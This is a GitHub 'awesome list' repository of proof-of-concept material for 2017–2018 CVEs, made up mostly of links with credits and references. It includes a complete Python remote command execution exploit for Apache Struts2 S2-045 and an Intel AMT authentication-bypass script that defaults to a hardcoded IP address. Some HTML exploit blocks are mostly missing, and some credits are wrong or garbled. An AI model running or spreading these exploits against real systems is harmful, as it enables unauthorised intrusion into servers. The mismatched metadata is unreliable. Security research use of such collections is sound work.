├── .github └── FUNDING.yml ├── .gitignore ├── .vscode └── settings.json ├── CONTRIBUTING.md ├── CVE-2017-0070.md ├── CVE-2017-0199.md ├── CVE-2017-0290.md ├── CVE-2017-0781.md ├── CVE-2017-1000353.md ├── CVE-2017-10271.md ├── CVE-2017-12611.md ├── CVE-2017-16995.md ├── CVE-2017-5116.md ├── CVE-2017-5123.md ├── CVE-2017-5638.md ├── CVE-2017-5689.md ├── CVE-2017-5715.md ├── CVE-2017-5753.md ├── CVE-2017-5754.md ├── CVE-2017-7293.md ├── CVE-2017-7494.md ├── CVE-2017-8464.md ├── CVE-2017-9791.md ├── CVE-2017-9805.md ├── CVE-2017-9993.md ├── CVE-2018-0492.md ├── CVE-2018-0886.md ├── CVE-2018-10933.md ├── CVE-2018-11235.md ├── CVE-2018-11776.md ├── CVE-2018-4878.md ├── CVE-2018-7600.md ├── CVE-2018-8174.md ├── MS17-010.md ├── README.md ├── Stack-Clash.md └── code-of-conduct.md /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: [qazbnm456] 2 | patreon: boik 3 | custom: https://medium.com/@qazbnm456 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_store 2 | -------------------------------------------------------------------------------- /.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "markdownlint.config": { 3 | "default": true, 4 | "MD033": { "allowed_elements": ["b", "br", "p", "img"] }, 5 | "MD034": false, 6 | "MD037": false 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | Appreciate and recognize [all contributors](https://github.com/qazbnm456/awesome-cve-poc/graphs/contributors). 2 | 3 | Please note that this project is released with a [Contributor Code of Conduct](https://github.com/qazbnm456/awesome-cve-poc/blob/master/code-of-conduct.md). By participating in this project you agree to abide by its terms. 4 | 5 | # Table of Contents 6 | 7 | - [Awesome CVE PoC contribution guidelines](#contribution-guidelines) 8 | - [Quality Standard](#quality-standard) 9 | - [Adding to this list](#adding-to-this-list) 10 | - [Adding something to an awesome list](#adding-something-to-an-awesome-list) 11 | - [Updating your Pull Request](#updating-your-pull-request) 12 | 13 | # Contribution Guidelines 14 | 15 | (your commit message will be a tweet, keep that in mind :) 16 | 17 | - **To add to the list:** Submit a pull request 18 | - **To remove from the list:** Submit a pull request 19 | - want to change something: Submit a pull request 20 | - want to try something else: Submit a pull request 21 | - don't know what to do: Submit a pull request or open an issue, let us know what's going on. 22 | 23 | `awesome-cve-poc` is a collection about Proof of Concepts of Common Vulnerabilities and Exposures. It would be nice if it is compatible with cve poc in some way. But if it's awesome, let's us know why and you're on! 24 | 25 | - Each item should be limited to one link, no duplicates, no redirection (careful with `http` vs `https`!) 26 | - The link should be the name of the poc 27 | - Description should be the same as CVE entry 28 | - if you want to add more than one link, please don't do all PR on the exact same line, it usually results in conflicts and your PR cannot be automatically merged... 29 | 30 | Please contribute links to slides/projects you have used or are familiar with. This will help ensure high-quality entries. 31 | 32 | # Quality standard 33 | 34 | Note that we can help you achieve those standards, just try your best, be brave. 35 | We'll guide you to the best of our abilities. 36 | 37 | To be on the list, it would be *nice* if entries adhere to these quality standards: 38 | 39 | - Generally useful to the community 40 | - Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person. 41 | - Solves a real problem (even a small one) 42 | - if it is a **WIP** (work in progress, not safe for production), mention it. 43 | 44 | If your PR is not merged, we will tell you why so that you may be able to improve it. 45 | 46 | # Awesome Related Contribution Guidelines 47 | 48 | ## Adding to this list 49 | 50 | Please ensure your pull request adheres to the following guidelines: 51 | 52 | - Search previous suggestions before making a new one, as yours may be a duplicate. 53 | - Make sure the list is useful before submitting. That implies it has enough content and every item has a good succinct description. 54 | - Make an individual pull request for each suggestion. 55 | - Use [title-casing](http://titlecapitalization.com) (AP style). 56 | - Use the following format: `[List Name](link)` 57 | - Link additions should be added to the bottom of the relevant category. 58 | - New categories or improvements to the existing categorization are welcome. 59 | - Check your spelling and grammar. 60 | - Make sure your text editor is set to remove trailing whitespace. 61 | - The pull request and commit should have a useful title. 62 | - The body of your commit message should contain a link to the repository. 63 | 64 | Thank you for your suggestions! 65 | 66 | ## Adding something to an awesome list 67 | 68 | If you have something awesome to contribute to an awesome list, this is how you do it. 69 | 70 | You'll need a [GitHub account](https://github.com/join)! 71 | 72 | 1. Access the awesome list's GitHub page. For example: https://github.com/sindresorhus/awesome 73 | 2. Click on the `readme.md` file: ![Step 2 Click on Readme.md](https://cloud.githubusercontent.com/assets/170270/9402920/53a7e3ea-480c-11e5-9d81-aecf64be55eb.png) 74 | 3. Now click on the edit icon. ![Step 3 - Click on Edit](https://cloud.githubusercontent.com/assets/170270/9402927/6506af22-480c-11e5-8c18-7ea823530099.png) 75 | 4. You can start editing the text of the file in the in-browser editor. Make sure you follow guidelines above. You can use [GitHub Flavored Markdown](https://help.github.com/articles/github-flavored-markdown/). ![Step 4 - Edit the file](https://cloud.githubusercontent.com/assets/170270/9402932/7301c3a0-480c-11e5-81f5-7e343b71674f.png) 76 | 5. Say why you're proposing the changes, and then click on "Propose file change". ![Step 5 - Propose Changes](https://cloud.githubusercontent.com/assets/170270/9402937/7dd0652a-480c-11e5-9138-bd14244593d5.png) 77 | 6. Submit the [pull request](https://help.github.com/articles/using-pull-requests/)! 78 | 79 | ## Updating your Pull Request 80 | 81 | Sometimes, a maintainer of an awesome list will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the awesome-* list guidelines. 82 | 83 | [Here](https://github.com/RichardLitt/knowledge/blob/master/github/amending-a-commit-guide.md) is a write up on how to change a Pull Request, and the different ways you can do that. 84 | -------------------------------------------------------------------------------- /CVE-2017-0070.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0070 2 | 3 | - Report: March 14, 2017 4 | - Credit: Lokihart of Google Project Zero 5 | 6 | ## PoC 7 | 8 | ```html 9 | 46 | 47 | 48 | 
49 |
50 | 51 | 52 | 90 | ``` 91 | 92 | ## Reference 93 | 94 | - [Microsoft Edge: Undefined behavior on some getters](https://bugs.chromium.org/p/project-zero/issues/detail?id=1043) 95 | -------------------------------------------------------------------------------- /CVE-2017-0199.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0199 2 | 3 | - Report: Apr 2017 4 | - Credit: FireEye 5 | 6 | ## PoC 7 | 8 | - [SyFi/cve-2017-0199](https://github.com/SyFi/cve-2017-0199) - Sample file used in the wild. 9 | - [bhdresh/CVE-2017-0199](https://github.com/bhdresh/CVE-2017-0199) - Exploit toolkit CVE-2017-0199. 10 | - [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-0199) 11 | 12 | ## Reference 13 | 14 | - [Analysis of a CVE-2017-0199 Malicious RTF Document](https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/) 15 | - [Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/) 16 | - [CVE-2017-0199](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199) 17 | -------------------------------------------------------------------------------- /CVE-2017-0290.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0290 2 | 3 | - Report: May 2017 4 | - Credit: Tavis Ormandy of Google Project Zero 5 | 6 | ## PoC 7 | 8 | - [https://bugs.chromium.org/p/project-zero/issues/attachment?aid=283405](https://bugs.chromium.org/p/project-zero/issues/attachment?aid=283405) 9 | 10 | ## Reference 11 | 12 | - [MsMpEng: Remotely Exploitable Type Confusion in Windows 8, 8.1, 10, Windows Server, SCEP, Microsoft Security Essentials, and more.](https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5) 13 | - [Microsoft Security Advisory 4022344 - Security Update for Microsoft Malware Protection Engine](https://technet.microsoft.com/en-us/library/security/4022344) 14 | - [漏洞预警 | Windows系统恶意软件防护引擎曝严重远程代码执行漏洞(CVE-2017-0290)](http://www.freebuf.com/vuls/134172.html) 15 | -------------------------------------------------------------------------------- /CVE-2017-0781.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0781 2 | 3 | - Report: Apr 2017 4 | - Credit: Armis Labs 5 | 6 | ## PoC 7 | 8 | - [ArmisSecurity/blueborne](https://github.com/ArmisSecurity/blueborne) - PoC scripts demonstrating the BlueBorne vulnerabilities 9 | - [BlueBorne RCE on Android 6.0.1 (CVE-2017-0781) [English]](https://jesux.es/exploiting/blueborne-android-6.0.1-english/) 10 | 11 | ## Reference 12 | 13 | - [BlueBorne​ ​on​ ​Android - Exploiting an RCE Over the Air](https://go.armis.com/hubfs/BlueBorne%20-%20Android%20Exploit.pdf) 14 | - [The Attack Vector “BlueBorne” Exposes Almost Every Connected Device](https://www.armis.com/blueborne/) 15 | -------------------------------------------------------------------------------- /CVE-2017-1000353.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-1000353 2 | 3 | - Report: Apr 26, 2017 4 | - Credit: An independent security researcher 5 | 6 | ## PoC 7 | 8 | - [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-1000353) 9 | - [phith0n/vulhub](https://github.com/phith0n/vulhub/tree/master/jenkins/CVE-2017-1000353) 10 | 11 | ## Reference 12 | 13 | - [Jenkins Security Advisory 2017-04-26](https://jenkins.io/security/advisory/2017-04-26/) 14 | - [Jenkins Java Deserialization CVE-2017-1000353 Remote Code Execution Vulnerability](http://www.securityfocus.com/bid/98056) 15 | -------------------------------------------------------------------------------- /CVE-2017-10271.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-10271 2 | 3 | - Report: Oct 2017 4 | - Credit: Alexey Tyurin of ERPScan and Federico Dotta of Media Service 5 | 6 | ## PoC 7 | 8 | - [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271) 9 | - [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271) 10 | 11 | ## Reference 12 | 13 | - [CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining](https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html) 14 | - [Weblogic XMLDecoder RCE分析](http://xxlegend.com/2017/12/23/Weblogic%20XMLDecoder%20RCE%E5%88%86%E6%9E%90/) 15 | - [Oracle WebLogic Exploit Used in Cryptocurrency Mining Campaign](https://www.darkreading.com/vulnerabilities---threats/oracle-weblogic-exploit-used-in-cryptocurrency-mining-campaign/d/d-id/1330791) 16 | - [CVE-2017-10271](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271) 17 | -------------------------------------------------------------------------------- /CVE-2017-12611.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-12611, which is also known as S2-053 2 | 3 | - Report: Aug 2017 4 | - Credit: Lupin from [jd.com](jd.com) security team, David Greene , and Roland McIntosh 5 | 6 | ## PoC 7 | 8 | - [S2-053 复现分析过程(附POC)](https://paper.tuisec.win/detail-0649dd1c013f593.html) 9 | - [Medicean/VulApps](https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-053) 10 | 11 | ## Reference 12 | 13 | - [S2-053](https://cwiki.apache.org/confluence/display/WW/S2-053) 14 | - [CVE-2017-12611](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12611) 15 | -------------------------------------------------------------------------------- /CVE-2017-16995.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-16995 2 | 3 | - Report: Dec 4, 2017 4 | - Credit: Jann Horn (Google Project Zero) 5 | 6 | ## PoC 7 | 8 | - [四两拨千斤 —— Ubuntu kernel eBPF 0day分析](https://security.tencent.com/index.php/blog/msg/124) 9 | - [iBearcat/CVE-2017-16995](https://github.com/iBearcat/CVE-2017-16995) 10 | - [Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation](https://www.exploit-db.com/exploits/44298/) 11 | 12 | ## Reference 13 | 14 | - [arbitrary read+write via incorrect range tracking in eBPF](https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3) 15 | - [CVE-2017-16995](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995) 16 | -------------------------------------------------------------------------------- /CVE-2017-5116.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5116 2 | 3 | - Report: Aug 2017 4 | - Fix: Aug 2017 5 | - Credit: Guang Gong of Alpha Team, Qihoo 360 6 | 7 | ## PoC 8 | 9 | ```html 10 | 11 |

poc

12 | 30 | 67 | 68 | ``` 69 | 70 | ## Reference 71 | 72 | - [Android Security Ecosystem Investments Pay Dividends for Pixel](https://android-developers.googleblog.com/2018/01/android-security-ecosystem-investments.html) 73 | - [Issue](https://crbug.com/759624) 74 | - [CVE-2017-5116](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5116) 75 | -------------------------------------------------------------------------------- /CVE-2017-5123.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5123 2 | 3 | - Report: October, 2017 4 | - Credit: hris Salls 5 | 6 | ## PoC 7 | 8 | - [nongiach/CVE](https://github.com/nongiach/CVE/tree/master/CVE-2017-5123) 9 | 10 | ## Reference 11 | 12 | - [Escaping Docker container using waitid() – CVE-2017-5123](https://www.twistlock.com/2017/12/27/escaping-docker-container-using-waitid-cve-2017-5123/) 13 | - [Exploiting CVE-2017-5123](https://reverse.put.as/2017/11/07/exploiting-cve-2017-5123/) 14 | - [CVE-2017-5123 Linux kernel v4.13 waitid() not calling access_ok()](http://seclists.org/oss-sec/2017/q4/78) 15 | - [CVE-2017-5123](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123) 16 | -------------------------------------------------------------------------------- /CVE-2017-5638.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5638, which is also known as S2-045 2 | 3 | - Report: Jan 2017 4 | - Credit: Nike Zheng \ 5 | 6 | ## PoC 7 | 8 | ```python 9 | #!/usr/bin/python 10 | # -*- coding: utf-8 -*- 11 | 12 | import urllib2 13 | import httplib 14 | 15 | 16 | def exploit(url, cmd): 17 | payload = "%{(#_='multipart/form-data')." 18 | payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." 19 | payload += "(#_memberAccess?" 20 | payload += "(#_memberAccess=#dm):" 21 | payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." 22 | payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." 23 | payload += "(#ognlUtil.getExcludedPackageNames().clear())." 24 | payload += "(#ognlUtil.getExcludedClasses().clear())." 25 | payload += "(#context.setMemberAccess(#dm))))." 26 | payload += "(#cmd='%s')." % cmd 27 | payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." 28 | payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." 29 | payload += "(#p=new java.lang.ProcessBuilder(#cmds))." 30 | payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." 31 | payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." 32 | payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." 33 | payload += "(#ros.flush())}" 34 | 35 | try: 36 | headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} 37 | request = urllib2.Request(url, headers=headers) 38 | page = urllib2.urlopen(request).read() 39 | except httplib.IncompleteRead, e: 40 | page = e.partial 41 | 42 | print(page) 43 | return page 44 | 45 | 46 | if __name__ == '__main__': 47 | import sys 48 | if len(sys.argv) != 3: 49 | print("[*] struts2_S2-045.py ") 50 | else: 51 | print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') 52 | url = sys.argv[1] 53 | cmd = sys.argv[2] 54 | print("[*] cmd: %s\n" % cmd) 55 | exploit(url, cmd) 56 | ``` 57 | 58 | ## Reference 59 | 60 | - [【漏洞预警】Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)](http://www.freebuf.com/vuls/128668.html) 61 | - [S2-045 原理初步分析(CVE-2017-5638)](http://paper.seebug.org/241/) 62 | - [CVE-2017-5638](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638) 63 | - [An Analysis Of CVE-2017-5638](https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html) 64 | - [Worried about Strutshock (CVE-2017-5638)?](https://www.tinfoilsecurity.com/strutshock). 65 | - [CWE-2017-5638](http://www.ninoishere.com/cwe-2017-5638/) 66 | -------------------------------------------------------------------------------- /CVE-2017-5689.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5689 2 | 3 | - Report: March 2017 4 | - Credit: Maksim Malyutin from Embedi 5 | 6 | ## PoC 7 | 8 | ```python 9 | #!/usr/bin/env python 10 | import requests 11 | import sys 12 | 13 | if len(sys.argv) > 1: 14 | ip = str(sys.argv[1]) 15 | else: 16 | ip = '168.235.84.117' 17 | 18 | url = 'http://'+ip+':16992/index.htm' 19 | req = requests.get(url) 20 | auth = req.headers['WWW-Authenticate'] 21 | words = auth.split('"') 22 | headers = 'Digest username= "admin", realm="'+words[1]+'", nonce="'+words[3]+'", uri="index.htm", response="", qop="auth", nc="00000001", cnonce="8858482c60513ab5" ' 23 | poc = requests.get(url, headers={'Authorization': headers}) 24 | if poc.status_code == 200: 25 | print('Success') 26 | else: 27 | print('Failed') 28 | ``` 29 | 30 | ## Reference 31 | 32 | - [Mitigating CVE-2017-5689, an Intel Management Engine Vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-cve-2017-5689-intel-management-engine-vulnerability/) 33 | - [Explained — How Intel AMT Vulnerability Allows to Hack Computers Remotely](http://thehackernews.com/2017/05/intel-amt-vulnerability.html) 34 | - [http-vuln-cve2017-5689 NSE Script](https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5689.html) 35 | - [simple python poc for CVE-2017-5689](https://github.com/kd0kkv/intel_amt_bypass) 36 | - [CVE-2017-5689](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689) 37 | -------------------------------------------------------------------------------- /CVE-2017-5715.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5715 (branch target injection) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero) and Paul Kocher in collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61) 5 | 6 | ## PoC 7 | 8 | - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) 9 | - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC 10 | 11 | ## Reference 12 | 13 | - [Spectre](https://spectreattack.com/spectre.pdf) 14 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 15 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 16 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 17 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 18 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 19 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 20 | - [CVE-2017-5715](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715) 21 | -------------------------------------------------------------------------------- /CVE-2017-5753.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5753 (bounds check bypass) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero) and Paul Kocher in collaboration with, in alphabetical order, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61) 5 | 6 | ## PoC 7 | 8 | - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - Example of using revealed "Spectre" exploit (CVE-2017-5753 and CVE-2017-5715) 9 | - [HarsaroopDhillon/SpectreExploit](https://github.com/HarsaroopDhillon/SpectreExploit) - SpectreExploit POC 10 | - [V-E-O/PoC](https://github.com/V-E-O/PoC/tree/master/CVE-2017-5753) - Spectre CVE-2017-5753 PoC for Android/Linux/ARM64 11 | 12 | ## Reference 13 | 14 | - [Spectre](https://spectreattack.com/spectre.pdf) 15 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 16 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 17 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 18 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 19 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 20 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 21 | - [CVE-2017-5753](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5753) 22 | -------------------------------------------------------------------------------- /CVE-2017-5754.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-5754 (rogue data cache load) 2 | 3 | - Report: Jun 1, 2017 4 | - Credit: Jann Horn (Google Project Zero), Werner Haas, Thomas Prescher @ Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz @ Graz University of Technology 5 | 6 | ## PoC 7 | 8 | - [IAIK/meltdown](https://github.com/IAIK/meltdown) 9 | - [CacheAttack.cpp](https://pastebin.com/CF91uGTG) 10 | - [paboldin/meltdown-exploit](https://github.com/paboldin/meltdown-exploit) 11 | - [raphaelsc/Am-I-affected-by-Meltdown](https://github.com/raphaelsc/Am-I-affected-by-Meltdown) 12 | - [lgeek/spec_poc_arm](https://github.com/lgeek/spec_poc_arm) 13 | - [GitMirar/meltdown-poc](https://github.com/GitMirar/meltdown-poc) 14 | 15 | ## Reference 16 | 17 | - [Meltdown](https://meltdownattack.com/meltdown.pdf) 18 | - [Time-travelling exploits with Meltdown](https://medium.com/@pwnallthethings/time-travelling-exploits-with-meltdown-1189548f1e1d) 19 | - [Reading privileged memory with a side-channel](https://googleprojectzero.blogspot.tw/2018/01/reading-privileged-memory-with-side.html) 20 | - [marcan/speculation-bugs](https://github.com/marcan/speculation-bugs) 21 | - [A Simple Explanation of the Differences Between Meltdown and Spectre](https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/) 22 | - [Intel: Intel Responds to Security Research Findings](https://newsroom.intel.com/news/intel-responds-to-security-research-findings/) 23 | - [Negative Result: Reading Kernel Memory From User Mode](https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/) 24 | - [History stealing using timing attack](http://antoinevastel.github.io/security/privacy/2017/04/09/history-stealing.html) 25 | - [CVE-2017-5754](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754) 26 | -------------------------------------------------------------------------------- /CVE-2017-7293.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-7293 2 | 3 | - Report: Jan 2017 4 | - Credit: Forshaw of Google Project Zero 5 | 6 | ## PoC 7 | 8 | - [tyranid/ExploitDotNetDCOM](https://github.com/tyranid/ExploitDotNetDCOM) 9 | 10 | ## Reference 11 | 12 | - [Windows: Dolby Audio X2 Service EoP](https://bugs.chromium.org/p/project-zero/issues/detail?id=1075) 13 | - [More Details About CVE-2014-4073 Elevation of Privilege Vulnerability](https://blogs.technet.microsoft.com/srd/2014/10/14/more-details-about-cve-2014-4073-elevation-of-privilege-vulnerability/) 14 | -------------------------------------------------------------------------------- /CVE-2017-7494.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-7494 2 | 3 | - Report: May 2017 4 | - Credit: steelo \ 5 | 6 | ## PoC 7 | 8 | - [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/samba/is_known_pipename.rb) 9 | - [Proof-of-Concept exploit for CVE-2017-7494(Samba RCE from a writable share)](https://github.com/omri9741/cve-2017-7494) 10 | - [Samba 3.5.0 - Remote Code Execution](https://www.exploit-db.com/exploits/42060/) 11 | - [Adding sambaPipe example](https://github.com/CoreSecurity/impacket/commit/32e71ef2369b10d8eaf2cf5a909252727e21f82d) 12 | 13 | ## Reference 14 | 15 | - [Samba远程代码执行漏洞(CVE-2017-7494)分析](http://blogs.360.cn/blog/samba远程代码执行漏洞cve-2017-7494分析/) 16 | - [Patching CVE-2017-7494 in Samba: It’s the Circle of Life](https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life) 17 | - [Samba - Security Announcement Archive: CVE-2017-7494.html](https://www.samba.org/samba/security/CVE-2017-7494.html) 18 | -------------------------------------------------------------------------------- /CVE-2017-8464.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-8464 2 | 3 | - Report: Jun 2017 4 | - Credit: Microsoft 5 | 6 | ## PoC 7 | 8 | - [nixawk/labs](https://github.com/nixawk/labs/tree/master/CVE-2017-8464) 9 | 10 | ## Reference 11 | 12 | - [“震网三代”CVE-2017-8464漏洞分析和预警](http://www.freebuf.com/news/143353.html) 13 | -------------------------------------------------------------------------------- /CVE-2017-9791.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-9791, which is also known as S2-048 2 | 3 | - Report: Jun 2017 4 | - Credit: icez \ from Tophant Competence Center 5 | 6 | ## PoC 7 | 8 | - [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048) 9 | - [nixawk/labs](https://github.com/nixawk/labs/blob/master/CVE-2017-9791/exploit_S2-048.py) 10 | 11 | ## Reference 12 | 13 | - [S2-048](https://struts.apache.org/docs/s2-048.html) 14 | - [Examining CVE-2017-9791: New Apache Struts Remote Code Execution Vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/examining-cve-2017-9791-new-apache-struts-remote-code-execution-vulnerability/?utm_campaign=shareaholic&utm_medium=facebook&utm_source=socialnetwork) 15 | - [[Tutorial] CVE-2017-9791: Apache Struts2 (S2-048) remote code execution vulnerability](https://securityonline.info/tutorial-cve-2017-9791-apache-struts2-s2-048-remote-code-execution-vulnerability/) 16 | - [CVE-2017-9791](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9791) 17 | -------------------------------------------------------------------------------- /CVE-2017-9805.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-9805, which is also known as S2-052 2 | 3 | - Report: July 2017 4 | - Credit: Man Yue Mo \ from [lgtm.com](https://lgtm.com/) / Semmle 5 | 6 | ## PoC 7 | 8 | - [https://hastebin.com/juvanuziji.http](https://hastebin.com/juvanuziji.http) - Originated from [http://blog.csdn.net/caiqiiqi/article/details/77861477](http://blog.csdn.net/caiqiiqi/article/details/77861477) 9 | - [jas502n/St2-052](https://github.com/jas502n/St2-052) 10 | - [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/blob/5ea83fee5ee8c23ad95608b7e2022db5b48340ef/modules/exploits/multi/http/struts2_rest_xstream.rb) 11 | - [Medicean/VulApps](https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-052) 12 | 13 | ## Reference 14 | 15 | - [S2-052](https://cwiki.apache.org/confluence/display/WW/S2-052) 16 | - [Using QL to find a remote code execution vulnerability in Apache Struts (CVE-2017-9805)](https://lgtm.com/blog/apache_struts_CVE-2017-9805) 17 | - [st052复线漏洞复现过程](https://www.77169.com/html/174708.html) 18 | - [CVE-2017-9805](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805) 19 | -------------------------------------------------------------------------------- /CVE-2017-9993.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-9993 2 | 3 | - Report: Jun 2017 4 | - Credit: [Corben Douglas](https://hackerone.com/cdl)(@sxcurity) 5 | 6 | ## PoC 7 | 8 | - [Local File Disclosure via ffmpeg](https://hackerone.com/reports/242831) 9 | 10 | ## Reference 11 | 12 | - [Local File Disclosure via ffmpeg](https://hackerone.com/reports/242831) 13 | - [漏洞预警 | FFmpeg曝任意文件读取漏洞](http://www.freebuf.com/vuls/138377.html) 14 | - [FFmpeg 安全问题讨论](http://paper.seebug.org/338/) 15 | - [avformat/avidec: Limit formats in gab2 to srt and ass/ssa](https://github.com/FFmpeg/FFmpeg/commit/a5d849b149ca67ced2d271dc84db0bc95a548abb) 16 | - [avformat/hls: Check local file extensions](https://github.com/FFmpeg/FFmpeg/commit/189ff4219644532bdfa7bab28dfedaee4d6d4021) 17 | - [CVE-2017-9993](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9993) 18 | -------------------------------------------------------------------------------- /CVE-2018-0492.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-0492 2 | 3 | - Report: Apr 2 2018 4 | - Credit: [Jasper Mattsson](https://www.drupal.org/u/Jasu_M) 5 | 6 | ## PoC 7 | 8 | - [fkt/race.c](https://gist.github.com/fkt/5f8f9560ef54e11ff7df8bec09dc8f9a) 9 | 10 | ## Reference 11 | 12 | - [HoleyBeep: Explanations and exploit](https://sigint.sh/#/holeybeep) 13 | - [johnath/beep#11](https://github.com/johnath/beep/issues/11) 14 | - [Hacker News](https://news.ycombinator.com/item?id=16762794) 15 | - [Debian Security Advisory](https://www.debian.org/security/2018/dsa-4163) 16 | - 